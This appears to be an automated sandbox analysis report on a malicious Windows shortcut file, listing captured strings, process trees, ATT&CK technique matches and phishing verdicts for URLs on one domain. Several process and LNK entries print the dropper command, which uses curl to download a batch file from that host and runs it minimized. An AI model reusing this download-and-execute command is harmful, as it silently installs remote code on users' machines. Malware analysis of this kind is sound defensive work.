Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.woff2?v=3.19.4)
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.woff?v=3.19.4)
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/assets/js/chunk.popups.js?ver=3.19.4
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/assets/js/chunk.slider.js?ver=3.19.4
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/assets/js/chunk.tooltips.js?ver=3.19.4
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/assets/js/flatsome.js?ver=8e60d746741250b4dd4e
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/assets/js/tvdseo.js
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/assets/js/woocommerce.js?ver=325ad20e90dbc8889310
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/inc/extensions/flatsome-live-search/flatsome-live-sear
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/style.css?ver=3.19.4
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/uploads/2022/01/LOGO_TVD_SEO_VUONG-removebg.png
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/uploads/2023/03/LOGO_TVD_SEO_PRO-removebg-1-510x213.png
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/uploads/2023/03/LOGO_TVD_SEO_PRO-removebg-1-600x251.png
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/uploads/2023/03/LOGO_TVD_SEO_PRO-removebg-1.png
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/uploads/2023/03/LOGO_TVD_SEO_VUONG-removebg.png
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/uploads/2023/03/cropped-LOGO-TVD-SEO-VUONG.png
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/uploads/2023/03/cropped-cropped-LOGO-TVD-SEO-VUONG-180x180.png
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/uploads/2023/03/cropped-cropped-LOGO-TVD-SEO-VUONG-192x192.png
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/uploads/2023/03/cropped-cropped-LOGO-TVD-SEO-VUONG-270x270.png
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/uploads/2023/03/cropped-cropped-LOGO-TVD-SEO-VUONG-32x32.png
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/uploads/2023/03/cropped-cropped-LOGO-TVD-SEO-VUONG.png
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/uploads/2024/09/GoogleSans-Bold.ttf
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/uploads/2024/09/GoogleSans-Italic.ttf
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/uploads/2024/09/GoogleSans-Medium.ttf
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/uploads/2024/09/GoogleSans-Regular.ttf
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-includes/js/dist/hooks.min.js?ver=4d63a3d491d11ffd8ac6
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-includes/js/hoverIntent.min.js?ver=1.10.2
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.1
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-json/
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/xmlrpc.php
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/xmlrpc.php?rsd
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://use.fontawesome.com/releases/v5.15.4/css/all.css?ver=2.0.3
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://www.dmca.com/Protection/Status.aspx?id=502286c4-db26-4ff5-898e-3899d9fd8507&amp;refurl=https
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://www.google.com/maps/embed?pb=
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://www.google.com/recaptcha/api.js?render=6LdvsEcqAAAAACGxQQMlRM5ahTlqMCdLjESH279L&amp;ver=3.0
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-4HCELHBG2B
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=GT-M3LB298
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-185801756-1
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-THFFBK43
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://www.youtube.com/channel/UCUZToD8MAs4MWywND_9DStg
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://www.youtube.com/channel/UCjt7SG-LPi6OafmLxoc1ULg
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://yoast.com/wordpress/plugins/seo/
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownHTTPS traffic detected: 104.21.81.137:443 -> 192.168.2.7:49703 version: TLS 1.2

System Summary

Source: document.lnk.download.lnk | LNK file: /c curl -s -o C:\Users\Public\UDkXtQleTB.bat https://tvdseo.com/file/quan.bat & start /min C:\Users\Public\UDkXtQleTB.bat
Source: classification engine | Classification label: mal72.winLNK@7/1@1/2
Source: C:\Windows\SysWOW64\curl.exe | File created: C:\Users\Public\UDkXtQleTB.bat
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7156:120:WilError_03
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c curl -s -o C:\Users\Public\UDkXtQleTB.bat https://tvdseo.com/file/quan.bat & start /min C:\Users\Public\UDkXtQleTB.bat
Source: C:\Windows\System32\conhost.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\SysWOW64\curl.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c curl -s -o C:\Users\Public\UDkXtQleTB.bat https://tvdseo.com/file/quan.bat & start /min C:\Users\Public\UDkXtQleTB.bat
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\curl.exe curl -s -o C:\Users\Public\UDkXtQleTB.bat https://tvdseo.com/file/quan.bat
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UDkXtQleTB.bat
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\curl.exe curl -s -o C:\Users\Public\UDkXtQleTB.bat https://tvdseo.com/file/quan.bat
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UDkXtQleTB.bat
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
Source: document.lnk.download.lnk | LNK file: ..\..\..\Windows\SysWOW64\cmd.exe

Persistence and Installation Behavior

Source: LNK file | Process created: C:\Windows\SysWOW64\cmd.exe
Source: LNK file | Process created: C:\Windows\SysWOW64\cmd.exe
Source: LNK file | Process created: C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: curl.exe, 00000002.00000003.1292734170.0000000003630000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\curl.exe curl -s -o C:\Users\Public\UDkXtQleTB.bat https://tvdseo.com/file/quan.bat
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UDkXtQleTB.bat
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Scripting (1) | Valid Accounts | Windows Management Instrumentation | Scripting (1) | Process Injection (11) | Masquerading (1) | OS Credential Dumping | Security Software Discovery (1) | Remote Services | Data from Local System | Encrypted Channel (1) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | DLL Side-Loading (1) | DLL Side-Loading (1) | Process Injection (11) | LSASS Memory | Process Discovery (1) | Remote Desktop Protocol | Data from Removable Media | Non-Application Layer Protocol (3) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | DLL Side-Loading (1) | Security Account Manager | File and Directory Discovery (1) | SMB/Windows Admin Shares | Data from Network Shared Drive | Application Layer Protocol (4) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Binary Padding | NTDS | System Information Discovery (11) | Distributed Component Object Model | Input Capture | Ingress Tool Transfer (3) | Traffic Duplication | Data Destruction

Numbers in parentheses are the count of matched signatures for that technique; cells without a number are unmatched default entries of the matrix.
Behavior Graph (ID 1562561): sample document.lnk.download.lnk, start date 25/11/2024, architecture WINDOWS, score 72. The LNK starts cmd.exe, which carries the signatures Antivirus detection for URL or domain, Windows shortcut file (LNK) starts blacklisted processes, Machine Learning detection for sample and 3 other signatures; cmd.exe starts curl.exe, a second cmd.exe and conhost.exe. curl.exe connects to tvdseo.com (104.21.81.137, port 443, local port 49703, CLOUDFLARENETUS, United States) and 127.0.0.1 (unknown), and drops C:\Users\Public\UDkXtQleTB.bat (HTML); the second cmd.exe starts conhost.exe.

Source | Detection | Scanner | Label
document.lnk.download.lnk | 5% | ReversingLabs |
document.lnk.download.lnk | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
https://tvdseo.com/wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6 | 100% | Avira URL Cloud | phishing
https://tvdseo.com/file/quan.batS | 100% | Avira URL Cloud | phishing
https://tvdseo.com/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.19.4 | 100% | Avira URL Cloud | phishing
https://tvdseo.com/wp-content/themes/flatsome/assets/js/chunk.tooltips.js?ver=3.19.4 | 100% | Avira URL Cloud | phishing
https://tvdseo.com/dich-vu-seo-app-store-ios/ | 100% | Avira URL Cloud | phishing
https://tvdseo.com/about/ | 100% | Avira URL Cloud | phishing
https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=9.4.1 | 100% | Avira URL Cloud | phishing
https://tvdseo.com/comments/feed/ | 100% | Avira URL Cloud | phishing
https://tvdseo.com/dich-vu-seo-app-chplay/ | 100% | Avira URL Cloud | phishing
https://tvdseo.com/wp-content/plugins/table-of-contents-plus/screen.min.css?ver=2411 | 100% | Avira URL Cloud | phishing
https://tvdseo.com/wp-content/fonts/dancing-script/If2cXTr6YS-zF4S-kcSWSVi_sxjsohD9F50Ruu7BMSo3ROp8l | 100% | Avira URL Cloud | phishing
https://tvdseo.com/wp-content/fonts/lato/S6u9w4BMUTPHh6UVSwaPGR_p.woff2) | 100% | Avira URL Cloud | phishing
https://tvdseo.com/wp-content/fonts/lato/S6uyw4BMUTPHjxAwXjeu.woff2) | 100% | Avira URL Cloud | phishing
https://tvdseo.com/category/phan-mem/ | 100% | Avira URL Cloud | phishing
https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot#iefix?v=3.19.4) | 100% | Avira URL Cloud | phishing
https://tvdseo.com/wp-content/uploads/2023/03/cropped-cropped-LOGO-TVD-SEO-VUONG-270x270.png | 100% | Avira URL Cloud | phishing
https://tvdseo.com/wp-content/fonts/lato/S6u9w4BMUTPHh6UVSwiPGQ.woff2) | 100% | Avira URL Cloud | phishing
https://tvdseo.com/url-short-short-link/ | 100% | Avira URL Cloud | phishing
https://tvdseo.com/file/quan.batD | 100% | Avira URL Cloud | phishing
https://tvdseo.com/wp-content/fonts/dancing-script/If2cXTr6YS-zF4S-kcSWSVi_sxjsohD9F50Ruu7BMSo3Rep8l | 100% | Avira URL Cloud | phishing
https://tvdseo.com/p/tool-multi-zalo-su-dung-nhieu-zalo-tren-may-tinh/ | 100% | Avira URL Cloud | phishing
https://tvdseo.com/app/ShemaTuyenDung.php | 100% | Avira URL Cloud | phishing
https://tvdseo.com/dich-vu-seo-tiktok/ | 100% | Avira URL Cloud | phishing
https://tvdseo.com/dich-vu-seo-shop-lazada/ | 100% | Avira URL Cloud | phishing
https://tvdseo.com/wp-content/themes/flatsome/assets/js/chunk.slider.js?ver=3.19.4 | 100% | Avira URL Cloud | phishing
https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.svg?v=3.19.4#fl-icons) | 100% | Avira URL Cloud | phishing
https://tvdseo.com/wp-content/fonts/lato/S6uyw4BMUTPHjx4wXg.woff2) | 100% | Avira URL Cloud | phishing
https://tvdseo.com/wp-content/uploads/2024/09/GoogleSans-Bold.ttf | 100% | Avira URL Cloud | phishing
https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/sourcebuster/sourcebuster.min.js?ver=9.4 | 100% | Avira URL Cloud | phishing
https://tvdseo.com/cart-2/ | 100% | Avira URL Cloud | phishing
https://tvdseo.com/ | 100% | Avira URL Cloud | phishing
https://tvdseo.com/remove-background-xoa-nen-anh-free/ | 100% | Avira URL Cloud | phishing
https://tvdseo.com/wp-content/uploads/2023/03/cropped-cropped-LOGO-TVD-SEO-VUONG-32x32.png | 100% | Avira URL Cloud | phishing
https://tvdseo.com/wp-content/themes/flatsome/style.css?ver=3.19.4 | 100% | Avira URL Cloud | phishing
https://tvdseo.com/#organization | 100% | Avira URL Cloud | phishing
https://tvdseo.com/wp-content/themes/flatsome/assets/js/woocommerce.js?ver=325ad20e90dbc8889310 | 100% | Avira URL Cloud | phishing
https://tvdseo.com/dich-vu-seo-youtube/ | 100% | Avira URL Cloud | phishing
https://tvdseo.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1 | 100% | Avira URL Cloud | phishing
https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver | 100% | Avira URL Cloud | phishing
https://tvdseo.com/wp-content/plugins/kk-star-ratings/src/core/public/js/kk-star-ratings.min.js?ver= | 100% | Avira URL Cloud | phishing
https://tvdseo.com/wp-content/themes/flatsome/assets/css/flatsome.css?ver=3.19.4 | 100% | Avira URL Cloud | phishing
https://tvdseo.com/wp-content/plugins/table-of-contents-plus/front.min.js?ver=2411 | 100% | Avira URL Cloud | phishing
https://tvdseo.com/category/tin-hoc-ab/ | 100% | Avira URL Cloud | phishing
https://tvdseo.com/wp-includes/js/dist/hooks.min.js?ver=4d63a3d491d11ffd8ac6 | 100% | Avira URL Cloud | phishing
https://tvdseo.com/file/quan.bate | 100% | Avira URL Cloud | phishing
https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/frontend/order-attribution.min.js?ver=9. | 100% | Avira URL Cloud | phishing
https://tvdseo.com/dich-vu-seo-shop-tmdt/ | 100% | Avira URL Cloud | phishing
https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.woff2?v=3.19.4) | 100% | Avira URL Cloud | phishing
https://tvdseo.com/wp-content/uploads/2023/03/cropped-cropped-LOGO-TVD-SEO-VUONG-192x192.png | 100% | Avira URL Cloud | phishing
https://tvdseo.com/wp-content/uploads/2023/03/LOGO_TVD_SEO_PRO-removebg-1-510x213.png | 100% | Avira URL Cloud | phishing
https://tvdseo.com/wp-content/plugins/contact-form-7/modules/recaptcha/index.js?ver=6.0 | 100% | Avira URL Cloud | phishing
https://tvdseo.com/wp-content/plugins/woocommerce/assets/fonts/Inter-VariableFont_slnt | 100% | Avira URL Cloud | phishing
https://tvdseo.com/xmlrpc.php | 100% | Avira URL Cloud | phishing
https://tvdseo.com/wp-content/plugins/kk-star-ratings/src/core/public/css/kk-star-ratings.min.css?ve | 100% | Avira URL Cloud | phishing
https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.woff?v=3.19.4) | 100% | Avira URL Cloud | phishing
https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.ttf?v=3.19.4) | 100% | Avira URL Cloud | phishing
https://tvdseo.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=6.0 | 100% | Avira URL Cloud | phishing
https://tvdseo.com/wp-content/themes/flatsome/assets/js/tvdseo.js | 100% | Avira URL Cloud | phishing
https://tvdseo.com/wp-content/themes/flatsome/assets/js/flatsome.js?ver=8e60d746741250b4dd4e | 100% | Avira URL Cloud | phishing
https://tvdseo.com/xmlrpc.php?rsd | 100% | Avira URL Cloud | phishing
https://tvdseo.com/iq-vo-cuc/ | 100% | Avira URL Cloud | phishing
https://tvdseo.com/file/quan.bat | 100% | Avira URL Cloud | phishing
https://tvdseo.com/wp-includes/js/hoverIntent.min.js?ver=1.10.2 | 100% | Avira URL Cloud | phishing
https://tvdseo.com/wp-content/themes/flatsome/inc/extensions/flatsome-live-search/flatsome-live-sear | 100% | Avira URL Cloud | phishing
https://congdonginan.vn/ | 0% | Avira URL Cloud | safe
https://tvdseo.com/wp-content/uploads/2023/03/cropped-LOGO-TVD-SEO-VUONG.png | 100% | Avira URL Cloud | phishing
https://tvdseo.com/wp-content/uploads/2023/03/cropped-cropped-LOGO-TVD-SEO-VUONG-180x180.png | 100% | Avira URL Cloud | phishing
https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/frontend/wp-consent-api-integration.min. | 100% | Avira URL Cloud | phishing
https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot?v=3.19.4); | 100% | Avira URL Cloud | phishing
https://tvdseo.com/dich-vu-seo-instagram/ | 100% | Avira URL Cloud | phishing
https://tvdseo.com/#website | 100% | Avira URL Cloud | phishing
https://tvdseo.com/wp-content/uploads/2022/01/LOGO_TVD_SEO_VUONG-removebg.png | 100% | Avira URL Cloud | phishing
https://tvdseo.com/dich-vu-seo-facebook/ | 100% | Avira URL Cloud | phishing
https://tvdseo.com/category/thongtinhay/ | 100% | Avira URL Cloud | phishing
https://tvdseo.com/wp-content/plugins/contact-form-7/includes/js/index.js?ver=6.0 | 100% | Avira URL Cloud | phishing
https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=9.4.1 | 100% | Avira URL Cloud | phishing
https://tvdseo.com/wp-content/plugins/google-site-kit/dist/assets/js/googlesitekit-consent-mode-3d64 | 100% | Avira URL Cloud | phishing
https://tvdseo.com/wp-content/plugins/woocommerce/assets/fonts/cardo_normal_400.woff2 | 100% | Avira URL Cloud | phishing
https://tvdseo.com/dich-vu-seo-fanpage/ | 100% | Avira URL Cloud | phishing
https://tvdseo.com/my-account-2/ | 100% | Avira URL Cloud | phishing
https://tvdseo.com/dich-vu-seo-google-map/ | 100% | Avira URL Cloud | phishing
https://tvdseo.com/wp-content/plugins/wp-consent-api/assets/js/wp-consent-api.min.js?ver=1.0.7 | 100% | Avira URL Cloud | phishing
https://tvdseo.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.1 | 100% | Avira URL Cloud | phishing
https://tvdseo.com/dich-vu-seo-shop-shoppe/ | 100% | Avira URL Cloud | phishing
https://tvdseo.com/wp-content/uploads/2024/09/GoogleSans-Regular.ttf | 100% | Avira URL Cloud | phishing
https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wc. | 100% | Avira URL Cloud | phishing
https://tvdseo.com/#/schema/logo/image/ | 100% | Avira URL Cloud | phishing
https://tvdseo.com/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=6.0 | 100% | Avira URL Cloud | phishing
Name | IP | Active | Malicious | Antivirus Detection | Reputation
tvdseo.com | 104.21.81.137 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
https://tvdseo.com/file/quan.bat | true | Avira URL Cloud: phishing | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
https://tvdseo.com/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.19.4 | UDkXtQleTB.bat.2.dr | true | Avira URL Cloud: phishing | unknown
https://tvdseo.com/wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6 | UDkXtQleTB.bat.2.dr | true | Avira URL Cloud: phishing | unknown
https://tvdseo.com/file/quan.batS | curl.exe, 00000002.00000002.1293075206.0000000003620000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=9.4.1 | UDkXtQleTB.bat.2.dr | true | Avira URL Cloud: phishing | unknown
https://tvdseo.com/dich-vu-seo-app-chplay/ | UDkXtQleTB.bat.2.dr | true | Avira URL Cloud: phishing | unknown
https://tvdseo.com/wp-content/themes/flatsome/assets/js/chunk.tooltips.js?ver=3.19.4 | UDkXtQleTB.bat.2.dr | true | Avira URL Cloud: phishing | unknown
https://tvdseo.com/about/ | UDkXtQleTB.bat.2.dr | true | Avira URL Cloud: phishing | unknown
https://tvdseo.com/dich-vu-seo-app-store-ios/ | UDkXtQleTB.bat.2.dr | true | Avira URL Cloud: phishing | unknown
https://tvdseo.com/comments/feed/ | UDkXtQleTB.bat.2.dr | true | Avira URL Cloud: phishing | unknown
https://tvdseo.com/wp-content/plugins/table-of-contents-plus/screen.min.css?ver=2411 | UDkXtQleTB.bat.2.dr | true | Avira URL Cloud: phishing | unknown
https://tvdseo.com/wp-content/fonts/dancing-script/If2cXTr6YS-zF4S-kcSWSVi_sxjsohD9F50Ruu7BMSo3ROp8l | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://www.google.com/recaptcha/api.js?render=6LdvsEcqAAAAACGxQQMlRM5ahTlqMCdLjESH279L&amp;ver=3.0 | UDkXtQleTB.bat.2.dr | false | | high
https://tvdseo.com/wp-content/fonts/lato/S6u9w4BMUTPHh6UVSwaPGR_p.woff2) | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/file/quan.batD | curl.exe, 00000002.00000002.1293163205.0000000003655000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1292708702.0000000003655000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/wp-content/fonts/lato/S6uyw4BMUTPHjxAwXjeu.woff2) | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot#iefix?v=3.19.4) | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/wp-content/fonts/lato/S6u9w4BMUTPHh6UVSwiPGQ.woff2) | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/category/phan-mem/ | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/wp-content/uploads/2023/03/cropped-cropped-LOGO-TVD-SEO-VUONG-270x270.png | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://gravatar.com/dungk396 | UDkXtQleTB.bat.2.dr | false | | high
https://tvdseo.com/url-short-short-link/ | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/wp-content/fonts/dancing-script/If2cXTr6YS-zF4S-kcSWSVi_sxjsohD9F50Ruu7BMSo3Rep8l | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/dich-vu-seo-tiktok/ | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/p/tool-multi-zalo-su-dung-nhieu-zalo-tren-may-tinh/ | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/app/ShemaTuyenDung.php | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/dich-vu-seo-shop-lazada/ | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/wp-content/themes/flatsome/assets/js/chunk.slider.js?ver=3.19.4 | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/wp-content/fonts/lato/S6uyw4BMUTPHjx4wXg.woff2) | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/wp-content/uploads/2024/09/GoogleSans-Bold.ttf | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.svg?v=3.19.4#fl-icons) | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://news.google.com/publications/CAAqBwgKMP6toQswlri5Aw?hl=vi&amp;gl=VN&amp;ceid=VN%3Avi | UDkXtQleTB.bat.2.dr | false | | high
https://tvdseo.com/cart-2/ | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/sourcebuster/sourcebuster.min.js?ver=9.4 | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://schema.org | UDkXtQleTB.bat.2.dr | false | | high
https://tvdseo.com/ | UDkXtQleTB.bat.2.dr | true | Avira URL Cloud: phishing | unknown
https://tvdseo.com/wp-content/uploads/2023/03/cropped-cropped-LOGO-TVD-SEO-VUONG-32x32.png | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
http://www.dmca.com/Protection/Status.aspx?ID=502286c4-db26-4ff5-898e-3899d9fd8507 | UDkXtQleTB.bat.2.dr | false | | high
https://tvdseo.com/wp-content/themes/flatsome/style.css?ver=3.19.4 | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/remove-background-xoa-nen-anh-free/ | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/#organization | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
